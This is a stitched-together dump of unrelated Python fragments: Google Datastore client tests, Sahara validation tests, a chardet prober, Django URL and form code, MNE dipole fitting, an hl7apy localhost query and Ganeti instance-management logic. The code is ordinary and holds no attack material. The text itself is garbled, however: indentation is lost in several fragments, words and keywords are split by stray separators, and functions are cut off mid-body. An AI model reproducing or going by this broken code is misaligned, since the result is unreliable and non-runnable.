    from google.cloud.datastore.key import Key

    kind = "Kind"
    id_ = 1234
    expected_path = [{"kind": kind, "id": id_}]

    # Stub the backend to return exactly one found entity.
    entity_pb = _make_entity_pb(self.PROJECT, kind, id_, "foo", "Foo")
    creds = _make_credentials()
    client = self._make_one(credentials=creds)
    ds_api = _make_datastore_api(
        lookup_response=_make_lookup_response(results=[entity_pb])
    )
    client._datastore_api_internal = ds_api

    key = Key(kind, id_, project=self.PROJECT)
    result, = client.get_multi([key])

    # The entity's key is rebuilt from the response, not the one passed in.
    self.assertIsNot(result.key, key)
    self.assertEqual(result.key.project, self.PROJECT)
    self.assertEqual(result.key.path, expected_path)
    self.assertEqual(list(result), ["foo"])
    self.assertEqual(result["foo"], "Foo")
    ds_api.lookup.assert_called_once_with(
        self.PROJECT, [key.to_protobuf()], read_options=datastore_pb2.ReadOptions()
    )
def test_get_multi_hit_w_transaction(self):
    """Lookups inside a transaction carry the transaction id in read_options."""
    from google.cloud.datastore_v1.proto import datastore_pb2
    from google.cloud.datastore.key import Key

    txn_id = b"123"
    kind = "Kind"
    id_ = 1234
    expected_path = [{"kind": kind, "id": id_}]

    # Stub the backend to return exactly one found entity.
    entity_pb = _make_entity_pb(self.PROJECT, kind, id_, "foo", "Foo")
    creds = _make_credentials()
    client = self._make_one(credentials=creds)
    ds_api = _make_datastore_api(
        lookup_response=_make_lookup_response(results=[entity_pb])
    )
    client._datastore_api_internal = ds_api

    txn = client.transaction()
    txn._id = txn_id
    key = Key(kind, id_, project=self.PROJECT)
    result, = client.get_multi([key], transaction=txn)

    # The entity's key is rebuilt from the response, not the one passed in.
    self.assertIsNot(result.key, key)
    self.assertEqual(result.key.project, self.PROJECT)
    self.assertEqual(result.key.path, expected_path)
    self.assertEqual(list(result), ["foo"])
    self.assertEqual(result["foo"], "Foo")
    ds_api.lookup.assert_called_once_with(
        self.PROJECT,
        [key.to_protobuf()],
        read_options=datastore_pb2.ReadOptions(transaction=txn_id),
    )
    def test_get_multi_hit_multiple_keys_same_project(self):
        """get_multi() with several same-project keys batches one lookup call."""
        from google.cloud.datastore_v1.proto import datastore_pb2
        from google.cloud.datastore.key import Key
        kind = "Kind"
        id1 = 1234
        id2 = 2345
        # Make a found entity pb to be returned from mock backend.
        entity_pb1 = _make_entity_pb(self.PROJECT, kind, id1)
        entity_pb2 = _make_entity_pb(self.PROJECT, kind, id2)
        # Make a connection to return the entity pbs.
        creds = _make_credentials()
        client = self._make_one(credentials=creds)
        lookup_response = _make_lookup_response(results=[entity_pb1, entity_pb2])
        ds_api = _make_datastore_api(lookup_response=lookup_response)
        client._datastore_api_internal = ds_api
        key1 = Key(kind, id1, project=self.PROJECT)
        key2 = Key(kind, id2, project=self.PROJECT)
        retrieved1, retrieved2 = client.get_multi([key1, key2])
        # Check values match: entities carry the right keys and no properties.
        self.assertEqual(retrieved1.key.path, key1.path)
        self.assertEqual(dict(retrieved1), {})
        self.assertEqual(retrieved2.key.path, key2.path)
        self.assertEqual(dict(retrieved2), {})
        # Both keys must go out in a single batched lookup.
        read_options = datastore_pb2.ReadOptions()
        ds_api.lookup.assert_called_once_with(
            self.PROJECT,
            [key1.to_protobuf(), key2.to_protobuf()],
            read_options=read_options,
        )
d | ef test_get_multi_hit_multiple_keys_different_project(self):
from google.cloud.datastore.key import Key
PROJECT1 = "PROJECT"
PROJECT2 = "PROJECT-ALT"
# Make sure our IDs are actually diffe | rent.
self.assertNotEqual(PROJECT1, PROJECT2)
key1 = Key("KIND", 1234, project=PROJECT1)
key2 = Key("KIND", 1234, project=PROJECT2)
creds = _make_credentials()
client = self._make_one(credentials=creds)
with self.assertRaises(ValueError):
client.get_multi([key1, key2])
    def test_get_multi_max_loops(self):
        """With _MAX_LOOPS patched to -1, get_multi() must not hit the API."""
        from google.cloud.datastore.key import Key
        kind = "Kind"
        id_ = 1234
        # Make a found entity pb to be returned from mock backend.
        entity_pb = _make_entity_pb(self.PROJECT, kind, id_, "foo", "Foo")
        # Make a connection to return the entity pb.
        creds = _make_credentials()
        client = self._make_one(credentials=creds)
        lookup_response = _make_lookup_response(results=[entity_pb])
        ds_api = _make_datastore_api(lookup_response=lookup_response)
        client._datastore_api_internal = ds_api
        key = Key(kind, id_, project=self.PROJECT)
        deferred = []
        missing = []
        # Force the retry loop to run zero iterations.
        patch = mock.patch("google.cloud.datastore.client._MAX_LOOPS", new=-1)
        with patch:
            result = client.get_multi([key], missing=missing, deferred=deferred)
        # Make sure we have no results, even though the connection has been
        # set up as in `test_hit` to return a single result.
        self.assertEqual(result, [])
        self.assertEqual(missing, [])
        self.assertEqual(deferred, [])
        ds_api.lookup.assert_not_called()
def test_put(self):
_called_with = []
def _put_multi(*args, **kw):
_called_with.append((args, kw))
creds = _make_credentials()
client = self._make_one(credentials=creds)
client.put_multi = _put_multi
entity = object()
client.put(entity)
self.assertEqual(_called_with[0][0], ())
self.assertEqual(_called_with[0][1]["entities"], [entity])
def test_put_multi_no_entities(self):
creds = _make_credentials()
client = self._make_one(credentials=creds)
self.assertIsNone(client.put_multi([]))
def test_put_multi_w_single_empty_entity(self):
# https://github.com/GoogleCloudPlatform/google-cloud-python/issues/649
from google.cloud.datastore.entity import Entity
creds = _make_credentials()
client = self._make_one(credentials=creds)
self.assertRaises(ValueError, client.put_multi, Entity())
    def test_put_multi_no_batch_w_partial_key(self):
        """put_multi() outside a batch commits non-transactionally and
        sends the partial key for the backend to complete."""
        from google.cloud.datastore_v1.proto import datastore_pb2
        from google.cloud.datastore.helpers import _property_tuples
        entity = _Entity(foo=u"bar")
        key = entity.key = _Key(self.PROJECT)
        key._id = None  # partial key: the backend must allocate the id
        creds = _make_credentials()
        client = self._make_one(credentials=creds)
        key_pb = _make_key(234)
        ds_api = _make_datastore_api(key_pb)
        client._datastore_api_internal = ds_api
        result = client.put_multi([entity])
        self.assertIsNone(result)
        # Exactly one commit, with no transaction and NON_TRANSACTIONAL mode.
        self.assertEqual(ds_api.commit.call_count, 1)
        _, positional, keyword = ds_api.commit.mock_calls[0]
        self.assertEqual(keyword, {"transaction": None})
        self.assertEqual(len(positional), 3)
        self.assertEqual(positional[0], self.PROJECT)
        self.assertEqual(positional[1], datastore_pb2.CommitRequest.NON_TRANSACTIONAL)
        mutations = positional[2]
|
#!/usr/bin/env python
"""Print the run status stored in a pickled Location object."""
import pickle
import argparse
from pprint import pprint
description = """
print out run status from pickled Location object
"""
parser = argparse.ArgumentParser(description=description)
# Pickle is a binary format: the file must be opened in binary mode ('rb').
# With FileType('r') (text mode), pickle.load() fails on Python 3.
parser.add_argument('pickle', type=argparse.FileType('rb'), help='path to location pickle')
args = parser.parse_args()
location = pickle.load(args.pickle)
pprint(location)
|
# Copyright (c) 2013 Red Hat Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY | KIND, either express or
# implied.
# See the License for the specific l | anguage governing permissions and
# limitations under the License.
import uuid
import mock
import six
from sahara.service.validations.edp import job_executor as je
from sahara.tests.unit.service.validation import utils as u
from sahara.utils import edp
def wrap_it(data):
    """Run job-executor validation on *data* (bound as the test-case's
    create function; the second argument is passed as 0 here)."""
    je.check_job_executor(data, 0)
class FakeJob(object):
    """Minimal stand-in for a stored job: a Java-type job with no libs."""
    type = edp.JOB_TYPE_JAVA
    libs = []
class TestJobExecJavaValidation(u.ValidationTestCase):
    """Validation of job-executor payloads for Java-type jobs."""
    def setUp(self):
        super(TestJobExecJavaValidation, self).setUp()
        # The base class drives validation through this callable/schema pair.
        self._create_object_fun = wrap_it
        self.scheme = je.JOB_EXEC_SCHEMA
    @mock.patch('sahara.service.validations.base.check_edp_job_support')
    @mock.patch('sahara.service.validations.base.check_cluster_exists')
    @mock.patch('sahara.service.edp.api.get_job')
    def test_java(self, get_job, check_cluster, check_oozie):
        """A Java job must specify edp.java.main_class in its configs."""
        check_cluster.return_value = True
        check_oozie.return_value = None
        get_job.return_value = FakeJob()
        # Missing main class -> INVALID_DATA error.
        self._assert_create_object_validation(
            data={
                "cluster_id": six.text_type(uuid.uuid4()),
                "job_configs": {"configs": {},
                                "params": {},
                                "args": []}
            },
            bad_req_i=(1, "INVALID_DATA",
                       "Java job must "
                       "specify edp.java.main_class"))
        # With the main class supplied, validation succeeds.
        self._assert_create_object_validation(
            data={
                "cluster_id": six.text_type(uuid.uuid4()),
                "job_configs": {
                    "configs": {
                        "edp.java.main_class": "org.me.myclass"},
                    "params": {},
                    "args": []}
            })
|
# ####################### BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Universal charset detector code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 2001
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
# Shy Shalom - original C code
# Proofpoint, Inc.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import sys
from . import constants
from .charsetprober import CharSetProber
class MultiByteCharSetProber(CharSetProber):
    """Base class for multi-byte-encoding probers.

    Subclasses provide ``_mCodingSM`` (a coding state machine) and
    ``_mDistributionAnalyzer`` (a character distribution analyzer); this
    class feeds the input through both and combines their verdicts.
    """
    def __init__(self):
        CharSetProber.__init__(self)
        self._mDistributionAnalyzer = None
        self._mCodingSM = None
        # Window of the last two bytes seen across feed() calls, so that
        # characters straddling buffer boundaries can still be analyzed.
        self._mLastChar = [0, 0]
    def reset(self):
        # Reset the sub-machines (when set by the subclass) and the window.
        CharSetProber.reset(self)
        if self._mCodingSM:
            self._mCodingSM.reset()
        if self._mDistributionAnalyzer:
            self._mDistributionAnalyzer.reset()
        self._mLastChar = [0, 0]
    def get_charset_name(self):
        # Abstract: each subclass returns its own charset name.
        pass
    def feed(self, aBuf):
        """Feed a buffer of bytes; return the prober state afterwards."""
        aLen = len(aBuf)
        for i in range(0, aLen):
            codingState = self._mCodingSM.next_state(aBuf[i])
            if codingState == constants.eError:
                # State machine rejected the byte sequence: not this charset.
                if constants._debug:
                    sys.stderr.write(self.get_charset_name()
                                     + ' prober hit error at byte ' + str(i)
                                     + '\n')
                self._mState = constants.eNotMe
                break
            elif codingState == constants.eItsMe:
                # Sequence is unambiguously this charset.
                self._mState = constants.eFoundIt
                break
            elif codingState == constants.eStart:
                # A complete character was consumed; hand it (with the byte
                # before it, for buffer-straddling characters) to the analyzer.
                charLen = self._mCodingSM.get_current_charlen()
                if i == 0:
                    self._mLastChar[1] = aBuf[0]
                    self._mDistributionAnalyzer.feed(self._mLastChar, charLen)
                else:
                    self._mDistributionAnalyzer.feed(aBuf[i - 1:i + 1],
                                                     charLen)
        self._mLastChar[0] = aBuf[aLen - 1]
        if self.get_state() == constants.eDetecting:
            if (self._mDistributionAnalyzer.got_enough_data() and
                (self.get_confidence() > constants.SHORTCUT_THRESHOLD)):
                # Confident enough to short-circuit further probing.
                self._mState = constants.eFoundIt
        return self.get_state()
    def get_confidence(self):
        # Confidence comes solely from the distribution analysis.
        return self._mDistributionAnalyzer.get_confidence()
|
from django.conf.urls import url
from . import views
# URL namespace for this app.
app_name = 'revisions'
# Route table: one class-based view per endpoint.
urlpatterns = [
    url(r'^revision/$', views.RevisionView.as_view(), name='revision'),
    url(r'^mail/$', views.MailView.as_view(), name='mail'),
]
|
[src['vertno']], nn=src['nn'][src['vertno']],
nuse=src['nuse'], coord_frame=src['coord_frame'],
vertno=np.arange(src['nuse']), type='discrete')
return SourceSpaces([src])
def _fit_eval(rd, B, B2, fwd_svd=None, fwd_data=None, whitener=None,
              lwork=None):
    """Calculate the residual sum of squares."""
    if fwd_svd is not None:
        uu, sing, vv = fwd_svd
    else:
        # No precomputed SVD: build the dipole forward and decompose it.
        fwd = _dipole_forwards(fwd_data, whitener, rd[np.newaxis, :])[0]
        uu, sing, vv = _repeated_svd(fwd, lwork, overwrite_a=True)
    gof = _dipole_gof(uu, sing, vv, B, B2)[0]
    # mne-c uses fitness=B2-Bm2, but ours (1-gof) is just a normalized version
    return 1. - gof
@functools.lru_cache(None)
def _get_ddot_dgemv_dgemm():
    # Cached lookup of the double-precision BLAS dot/gemv/gemm routines.
    return _get_blas_funcs(np.float64, ('dot', 'gemv', 'gemm'))
def _dipole_gof(uu, sing, vv, B, B2):
    """Calculate the goodness of fit from the forward SVD."""
    ddot, dgemv, _ = _get_ddot_dgemv_dgemm()
    # Use three components unless the third singular value is small
    # relative to the first (guard against division by zero).
    denom = sing[0] if sing[0] > 0 else 1.
    ncomp = 3 if sing[2] / denom > 0.2 else 2
    one = dgemv(1., vv[:ncomp], B)  # np.dot(vv[:ncomp], B)
    Bm2 = ddot(one, one)  # np.sum(one * one)
    return Bm2 / B2, one
def _fit_Q(fwd_data, whitener, B, B2, B_orig, rd, ori=None):
    """Fit the dipole moment once the location is known."""
    from scipy import linalg
    if 'fwd' in fwd_data:
        # should be a single precomputed "guess" (i.e., fixed position)
        assert rd is None
        fwd = fwd_data['fwd']
        assert fwd.shape[0] == 3
        fwd_orig = fwd_data['fwd_orig']
        assert fwd_orig.shape[0] == 3
        scales = fwd_data['scales']
        assert scales.shape == (3,)
        fwd_svd = fwd_data['fwd_svd'][0]
    else:
        # Compute the forward model at this candidate position.
        fwd, fwd_orig, scales = _dipole_forwards(fwd_data, whitener,
                                                 rd[np.newaxis, :])
        fwd_svd = None
    if ori is None:
        # Free orientation: project the data onto the forward SVD basis.
        if fwd_svd is None:
            fwd_svd = linalg.svd(fwd, full_matrices=False)
        uu, sing, vv = fwd_svd
        gof, one = _dipole_gof(uu, sing, vv, B, B2)
        ncomp = len(one)
        one /= sing[:ncomp]
        Q = np.dot(one, uu.T[:ncomp])
    else:
        # Fixed orientation: collapse the forward to a single field vector.
        fwd = np.dot(ori[np.newaxis], fwd)
        sing = np.linalg.norm(fwd)
        one = np.dot(fwd / sing, B)
        gof = (one * one)[0] / B2
        Q = ori * np.sum(one / sing)
        ncomp = 3
    # Counteract the effect of column normalization
    Q *= scales[0]
    # Residual in the original (unwhitened, unprojected) measurement space.
    B_residual_noproj = B_orig - np.dot(fwd_orig.T, Q)
    return Q, gof, B_residual_noproj, ncomp
def _fit_dipoles(fun, min_dist_to_inner_skull, data, times, guess_rrs,
                 guess_data, fwd_data, whitener, ori, n_jobs, rank):
    """Fit a single dipole to the given whitened, projected data."""
    from scipy.optimize import fmin_cobyla
    parallel, p_fun, _ = parallel_func(fun, n_jobs)
    # parallel over time points
    res = parallel(p_fun(min_dist_to_inner_skull, B, t, guess_rrs,
                         guess_data, fwd_data, whitener,
                         fmin_cobyla, ori, rank)
                   for B, t in zip(data.T, times))
    # Each result tuple is (pos, amp, ori, gof, conf, khi2, nfree, residual).
    pos = np.array([r[0] for r in res])
    amp = np.array([r[1] for r in res])
    ori = np.array([r[2] for r in res])
    gof = np.array([r[3] for r in res]) * 100  # convert to percentage
    conf = None
    if res[0][4] is not None:
        # Assemble per-time-point confidence limits into a dict of arrays.
        conf = np.array([r[4] for r in res])
        keys = ['vol', 'depth', 'long', 'trans', 'qlong', 'qtrans']
        conf = {key: conf[:, ki] for ki, key in enumerate(keys)}
    khi2 = np.array([r[5] for r in res])
    nfree = np.array([r[6] for r in res])
    # Stack residuals as channels x times.
    residual_noproj = np.array([r[7] for r in res]).T
    return pos, amp, ori, gof, conf, khi2, nfree, residual_noproj
'''Simplex code in case we ever want/need it for testing
def _make_tetra_simplex():
"""Make the initial tetrahedron"""
#
# For this definition of a regular tetrahedron, see
#
# http://mathworld.wolfram.com/Tetrahedron.html
#
x = np.sqrt(3.0) / 3.0
r = np.sqrt(6.0) / 12.0
R = 3 * r
d = x / 2.0
simplex = 1e-2 * np.array([[x, 0.0, -r],
[-d, 0.5, -r],
[-d, -0.5, -r],
[0., 0., R]])
return simplex
def try_(p, y, psum, ndim, fun, ihi, neval, fac):
"""Helper to try a value"""
ptry = np.empty(ndim)
fac1 = (1.0 - fac) / ndim
fac2 = fac1 - fac
ptry = psum * fac1 - p[ihi] * fac2
ytry = fun(ptry)
neval += 1
if ytry < y[ihi]:
y[ihi] = ytry
psum[:] += ptry - p[ihi]
p[ihi] = ptry
return ytry, neval
def _simplex_minimize(p, ftol, stol, fun, max_eval=1000):
"""Minimization with the simplex algorithm
Modified from Numerical recipes"""
y = np.array([fun(s) for s in p])
ndim = p.shape[1]
assert p.shape[0] == ndim + 1
mpts = ndim + 1
neval = 0
psum = p.sum(axis=0)
loop = 1
while(True):
ilo = 1
if y[1] > y[2]:
ihi = 1
inhi = 2
else:
ihi = 2
inhi = 1
for i in range(mpts):
if y[i] < y[ilo]:
ilo = i
if y[i] > y[ihi]:
inhi = ihi
ihi = i
elif y[i] > y[inhi]:
if i != ihi:
inhi = i
rtol = 2 * np.abs(y[ihi] - y[ilo]) / (np.abs(y[ihi]) + np.abs(y[ilo]))
if rtol < ftol:
break
if neval >= max_eval:
raise RuntimeError('Maximum number of evaluations exceeded.')
if stol > 0: # Has the simplex collapsed?
dsum = np.sqrt(np.sum((p[ilo] - p[ihi]) ** 2))
if loop > 5 and dsum < stol:
break
ytry, neval = try_(p, y, psum, ndim, fun, ihi, neval, -1.)
if ytry <= y[ilo]:
ytry, neval = try_(p, y, psum, ndim, fun, ihi, neval, 2.)
elif ytry >= y[inhi]:
ysave = y[ihi]
ytry, neval = try_(p, y, psum, ndim, fun, ihi, neval, 0.5)
if ytry >= ysave:
for i in range(mpts):
if i != ilo:
psum[:] = 0.5 * (p[i] + p[ilo])
p[i] = psum
y[i] = fun(psum)
neval += ndim
psum = p.sum(axis=0)
loop += 1
'''
def _fit_confidence(rd, Q, ori, whitener, fwd_data):
    # As described in the Xfit manual, confidence intervals can be calculated
# by examining a linearization of model at the best-fitting location,
# i.e. taking the Jacobian and using the whitener:
#
# J = [∂b/∂x ∂b/∂y ∂b/∂z ∂b/∂Qx ∂b/∂Qy ∂b/∂Qz]
# C = (J.T C^-1 J)^-1
#
# And then the confidence interval is the diagonal of C, scaled by 1.96
# (for 95% confidence).
from scipy import linalg
direction = np.empty((3, 3))
# The coordinate system has the x axis aligned with the dipole orientation,
direction[0] = ori
# the z axis through the origin of the sphere model
rvec = rd - fwd_data['inner_skull']['r0']
direction[2] = rvec - ori * np.dot(ori, rvec) # orthogonalize
direction[2] /= np.linalg.norm(direction[2])
    # and the y axis perpendicular to these, forming a right-handed system.
direction[1] = np.cross(direction[2], direction[0])
assert np.allclose(np.dot(direction, direction.T), np.eye(3))
# Get spatial deltas in dipole coordinate directions
deltas = (-1e-4, 1e-4)
J = np.empty((whitener.shape[0], 6))
for ii in range(3):
fwds = []
for delta in deltas:
this_r = rd[np.newaxis] + delta * direction[ii]
fwds.append(
np.dot(Q, _dipole_forwards(fwd_data, whitener, this_r)[0]))
J[:, ii] = np.diff(fwds, axis=0)[0] / np.diff(deltas)[0]
# Get current (Q) deltas in the dipole directions
deltas = np.array([-0.01, 0.01]) * np.linalg.norm(Q)
this_fwd = _dipole_forwards(fwd_data, whitener, rd[np.newaxis])[0]
for ii in range(3):
fwds = []
for delta in deltas:
fwds.append(np.dot(Q + delta * direction[ii], this_fwd))
J[:, ii + 3] = |
# -*- coding: utf-8 -*-
#
# Copyright (c) 2012-2018, CRS4
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY | OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import socket
from hl7apy.parser | import parse_message
def query(host, port):
    """Send a hard-coded PDQ query over MLLP and return the raw response."""
    msg = \
        'MSH|^~\&|REC APP|REC FAC|SEND APP|SEND FAC|20110708163513||QBP^Q22^QBP_Q21|111069|D|2.5|||||ITA||EN\r' \
        'QPD|IHE PDQ Query|111069|@PID.5.2^SMITH||||\r' \
        'RCP|I|'
    # The context manager closes the socket on exit, exactly like the
    # try/finally it replaces.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.connect((host, port))
        # send the message, MLLP-framed and UTF-8 encoded
        sock.sendall(parse_message(msg).to_mllp().encode('UTF-8'))
        # receive the answer
        received = sock.recv(1024*1024)
        return received
if __name__ == '__main__':
    # Demo run against a local MLLP server.
    response = query('localhost', 6789)
    print("Received response: ")
    print(repr(response))
|
"""
if not self.op.no_remember:
self.cfg.MarkInstanceUp(self.instance.uuid)
if self.primary_offline:
assert self.op.ignore_offline_nodes
self.LogInfo("Primary node offline, marked instance as started")
else:
StartInstanceDisks(self, self.instance, self.op.force)
result = \
self.rpc.call_instance_start(self.instance.primary_node,
(self.instance, self.op.hvparams,
self.op.beparams),
self.op.startup_paused, self.op.reason)
msg = result.fail_msg
if msg:
ShutdownInstanceDisks(self, self.instance)
raise errors.OpExecError("Could not start instance: %s" % msg)
class LUInstanceShutdown(LogicalUnit):
  """Shutdown an instance.
  """
  HPATH = "instance-stop"
  HTYPE = constants.HTYPE_INSTANCE
  REQ_BGL = False
  def ExpandNames(self):
    self._ExpandAndLockInstance()
  def BuildHooksEnv(self):
    """Build hooks env.
    This runs on master, primary and secondary nodes of the instance.
    """
    env = BuildInstanceHookEnvByObject(self, self.instance)
    env["TIMEOUT"] = self.op.timeout
    return env
  def BuildHooksNodes(self):
    """Build hooks nodes.
    """
    nl = [self.cfg.GetMasterNode()] + list(self.instance.all_nodes)
    return (nl, nl)
  def CheckPrereq(self):
    """Check prerequisites.
    This checks that the instance is in the cluster.
    """
    self.instance = self.cfg.GetInstanceInfo(self.op.instance_uuid)
    assert self.instance is not None, \
      "Cannot retrieve locked instance %s" % self.op.instance_name
    # --force skips the online-state check; warn so the operator knows.
    if not self.op.force:
      CheckInstanceState(self, self.instance, INSTANCE_ONLINE)
    else:
      self.LogWarning("Ignoring offline instance check")
    self.primary_offline = \
      self.cfg.GetNodeInfo(self.instance.primary_node).offline
    if self.primary_offline and self.op.ignore_offline_nodes:
      self.LogWarning("Ignoring offline primary node")
    else:
      CheckNodeOnline(self, self.instance.primary_node)
  def Exec(self, feedback_fn):
    """Shutdown the instance.
    """
    # If the instance is offline we shouldn't mark it as down, as that
    # resets the offline flag.
    if not self.op.no_remember and self.instance.admin_state in INSTANCE_ONLINE:
      self.cfg.MarkInstanceDown(self.instance.uuid)
    if self.primary_offline:
      assert self.op.ignore_offline_nodes
      self.LogInfo("Primary node offline, marked instance as stopped")
    else:
      result = self.rpc.call_instance_shutdown(
        self.instance.primary_node,
        self.instance,
        self.op.timeout, self.op.reason)
      msg = result.fail_msg
      # Shutdown failure is only a warning here; disks are shut down anyway.
      if msg:
        self.LogWarning("Could not shutdown instance: %s", msg)
      ShutdownInstanceDisks(self, self.instance)
class LUInstanceReinstall(LogicalUnit):
  """Reinstall an instance.
  """
  HPATH = "instance-reinstall"
  HTYPE = constants.HTYPE_INSTANCE
  REQ_BGL = False
  def ExpandNames(self):
    self._ExpandAndLockInstance()
  def BuildHooksEnv(self):
    """Build hooks env.
    This runs on master, primary and secondary nodes of the instance.
    """
    return BuildInstanceHookEnvByObject(self, self.instance)
  def BuildHooksNodes(self):
    """Build hooks nodes.
    """
    nl = [self.cfg.GetMasterNode()] + list(self.instance.all_nodes)
    return (nl, nl)
  def CheckPrereq(self):
    """Check prerequisites.
    This checks that the instance is in the cluster and is not running.
    """
    instance = self.cfg.GetInstanceInfo(self.op.instance_uuid)
    assert instance is not None, \
      "Cannot retrieve locked instance %s" % self.op.instance_name
    CheckNodeOnline(self, instance.primary_node, "Instance primary node"
                    " offline, cannot reinstall")
    # A diskless instance has no OS to reinstall.
    if instance.disk_template == constants.DT_DISKLESS:
      raise errors.OpPrereqError("Instance '%s' has no disks" %
                                 self.op.instance_name,
                                 errors.ECODE_INVAL)
    CheckInstanceState(self, instance, INSTANCE_DOWN, msg="cannot reinstall")
    if self.op.os_type is not None:
      # OS verification
      CheckNodeHasOS(self, instance.primary_node, self.op.os_type,
                     self.op.force_variant)
      instance_os = self.op.os_type
    else:
      instance_os = instance.os
    node_uuids = list(instance.all_nodes)
    if self.op.osparams:
      i_osdict = GetUpdatedParams(instance.osparams, self.op.osparams)
      CheckOSParams(self, True, node_uuids, instance_os, i_osdict)
      self.os_inst = i_osdict # the new dict (without defaults)
    else:
      self.os_inst = None
    self.instance = instance
  def Exec(self, feedback_fn):
    """Reinstall the instance.
    """
    if self.op.os_type is not None:
      feedback_fn("Changing OS to '%s'..." % self.op.os_type)
      self.instance.os = self.op.os_type
      # Write to configuration
      self.cfg.Update(self.instance, feedback_fn)
    StartInstanceDisks(self, self.instance, None)
    try:
      feedback_fn("Running the instance OS create scripts...")
      # FIXME: pass debug option from opcode to backend
      result = self.rpc.call_instance_os_add(self.instance.primary_node,
                                             (self.instance, self.os_inst),
                                             True, self.op.debug_level)
      result.Raise("Could not install OS for instance %s on node %s" %
                   (self.instance.name,
                    self.cfg.GetNodeName(self.instance.primary_node)))
    finally:
      # Always shut the disks back down, even if the OS install failed.
      ShutdownInstanceDisks(self, self.instance)
class LUInstanceReboot(LogicalUnit):
"""Reboot an instance.
"""
HPATH = "instance-reboot"
HTYPE = constants.HTYPE_INSTANCE
REQ_BGL = False
def ExpandNames(self):
self._ExpandAndLockInstance()
def BuildHooksEnv(self):
"""Build hooks env.
This runs on master, primary and secondary nodes of the instance.
"""
env = {
"IGNORE_SECONDARIES": self.op.ignore_secondaries,
"REBOOT_TYPE": self.op.reboot_type,
"SHUTDOWN_TIMEOUT": self.op.shutdown_timeout,
}
env.update(BuildInstanceHookEnvByObject(self, self.instance))
return env
def BuildHooksNodes(self):
"""Build hooks nodes.
"""
nl = [self.cfg.GetMasterNode()] + list(self.instance.all_nodes)
return (nl, nl)
def CheckPrereq(self):
"""Check prerequisites.
This checks that the instance is in the cluster.
"""
self.instance = self.cfg.GetInstanceInfo(self.op.instance_uuid)
assert self.instance is not None, \
"Cannot retrieve locked instance %s" % self.op.instance_name
CheckInstanceState(self, self.instance, INSTANCE_ONLINE)
CheckNodeOnline(self, self.instance.primary_node)
# check bridges existence
CheckInstanceBridgesExist(self, self.instance)
def Exec(self, feedback_fn):
"""Reboot the instance.
"""
cluster = self.cfg.GetClusterInfo()
remote_info = self.rpc.call_instance_info(
self.instance.primary_node, self.instance.name,
self.instance.hypervisor, cluster.hvparams[self.instance.hypervisor])
remote_info.Raise("Error checking node %s" %
self.cfg.GetNodeName(self.instance.primary_node))
instance_running = bool(remote_info.payload)
current_node_uuid = self.instance.primary_node
if instance_running and \
self.op.reboot_type in [constants.INSTANCE_REBOOT_SOFT,
constants.INSTANCE_REBOOT_HARD]:
result = self.rpc.call_instance_reboot(current_node_uuid, self.instance,
self.op.reboot_type,
self.op.shutdown_timeout,
self.op.reason)
result.Raise("Could not reboot instance")
else:
if instance_running:
result = self.rpc.call_instance_shutdown(current_node_uuid,
self.instance,
self.op.shutdown_timeout,
|
__all__ | = ['ttypes' | , 'constants', 'PlayerStrategy']
|
##############################################################################
#
# Immobilier it's an application
# designed to manage the core business of property management, buildings,
# rental agreement and so on.
#
# Copyright (C) 2016-2018 Verpoorten Leïla
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# A copy of this license - GNU General Public License - is available
# at the root of the source code of this program. If not,
# see http://www.gnu.org/licenses/.
#
##############################################################################
from django import forms
from main import models as mdl
from main.forms.utils.datefield import DatePickerInput, DATE_FORMAT
from main.models.enums import etat_suivi as etat_suivi_enum
# HTML attribute value used to mark form widgets as read-only.
READONLY_ATTR = "disabled"
class SuiviForm(forms.ModelForm):
    """Form for editing a rent-payment follow-up (SuiviLoyer).

    ``date_paiement`` and ``financement_location`` travel as hidden fields;
    the user edits the status, the received amounts and the actual payment
    date.
    """
    date_paiement_reel = forms.DateField(widget=DatePickerInput(format=DATE_FORMAT),
                                         input_formats=[DATE_FORMAT, ],
                                         required=False)
    class Meta:
        model = mdl.suivi_loyer.SuiviLoyer
        fields = ['date_paiement', 'financement_location', 'etat_suivi', 'remarque', 'loyer_percu', 'charges_percu',
                  'date_paiement_reel']
